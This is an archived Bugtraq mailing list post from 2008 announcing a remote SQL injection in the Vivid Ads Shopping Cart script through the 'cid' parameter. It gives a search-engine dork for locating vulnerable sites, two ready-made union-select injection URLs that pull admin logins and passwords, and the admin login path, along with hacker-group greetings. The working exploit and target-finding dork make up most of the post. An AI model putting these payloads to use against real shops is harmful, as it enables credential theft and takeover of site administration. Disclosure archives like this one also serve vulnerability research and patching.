Bugtraq mailing list archives
Vivid Ads Shopping Cart (cid) Remote SQL Injection
From: djmomo () live com
Date: Tue, 14 Oct 2008 22:05:48 -0600
## Vivid Ads Shopping Cart (cid) Remote SQL Injection ## ## Discovered By : KoDoQ_GiLa () irc mildnet org 15/10/2008 ## HomePage : http://mildnet.org ## Thx to : Nyubi aka Solpot,home_edition2001,dead,ardan, anakbugis,kaka11,rahulx_is_back,anti_underground,che`io AND FOR ALL IRC.MILDNET.ORG COMMUNITY ################################################################################# ## Dork : "Vivid Ads Shopping Cart" ## =-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-= http://www.target.com/category.php?cid=-1+union+select+concat(login,0x3a,password)+from+admin-- http://www.target.com/vivid_ads folder/category.php?cid=-1+union+select+concat(login,0x3a,password)+from+admin-- ======== (AdMiN LoGiN) ======= http://www.target.com/admin/ ## Contact person : djmomo[At]live[DoT]com ## VIVA IRC.MILDNET.ORG ##
Current thread:
- Vivid Ads Shopping Cart (cid) Remote SQL Injection djmomo (Oct 15)